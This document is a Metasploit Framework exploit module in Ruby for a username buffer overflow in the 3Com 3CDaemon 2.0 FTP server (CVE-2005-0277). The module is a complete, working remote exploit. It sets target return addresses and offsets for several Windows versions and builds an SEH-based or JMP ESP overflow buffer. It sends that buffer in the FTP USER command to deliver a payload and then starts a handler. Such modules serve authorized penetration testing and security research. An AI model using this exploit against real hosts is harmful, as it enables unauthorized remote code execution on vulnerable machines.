metasploit-framework/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => '3Com 3CDaemon 2.0 FTP Username Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the 3Com 3CDaemon
        FTP service. This package is being distributed from the 3Com
        web site and is recommended in numerous support documents.
        This module uses the USER command to trigger the overflow.
      },
      'Author'         =>
        [
          'hdm',       # Original author
          'otr'        # Windows XP SP3
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-0277'],
          [ 'OSVDB', '12810'],
          [ 'OSVDB', '12811'],
          [ 'BID', '12155']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'target' => 0
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 674,
          'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
          'StackAdjustment' => -3500,
          'Compat'   =>
            {
              'ConnectionType' => "-find"
            }
        },
      'Platform'       => %w{ win },
      'Targets'        =>
        [
          [
            'Windows 2000 English', # Tested OK - hdm 11/24/2005
            {
              'Platform' => 'win',
              'Ret'      => 0x75022ac4, # ws2help.dll
              'Offset'   => 229,
            },
          ],
          [
            'Windows XP English SP0/SP1',
            {
              'Platform' => 'win',
              'Ret'      => 0x71aa32ad, # ws2help.dll
              'Offset'   => 229,
            },
          ],
          [
            'Windows NT 4.0 SP4/SP5/SP6',
            {
              'Platform' => 'win',
              'Ret'      => 0x77681799, # ws2help.dll
              'Offset'   => 229,
            },
          ],
          [
            'Windows 2000 Pro SP4 French',
            {
              'Platform' => 'win',
              'Ret' => 0x775F29D0,
              'Offset'   => 229,
            },
          ],
          [
            'Windows XP English SP3',
            {
              'Platform' => 'win',
              'Ret'      => 0x7CBD41FB,   # 7CBD41FB JMP ESP shell32.data SP3
              #'Ret'      => 0x775C2C1F,   # 775C2C1F JMP ESP shell32.data SP1
              'Offset'   => 245,
            },
          ],
        ],
      'DisclosureDate' => '2005-01-04'))
  end

  def check
    connect
    disconnect
    if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    if (target == targets[4])
      buf = rand_text_english(target['Offset'], payload_badchars)
      buf << [ target['Ret'] ].pack('V') * 2
      buf << payload.encoded
    else
      buf = rand_text_english(2048, payload_badchars)
      seh = generate_seh_payload(target.ret)
      buf[target['Offset'], seh.length] = seh
    end

    send_cmd( ['USER', buf] , false )

    handler
    disconnect
  end
end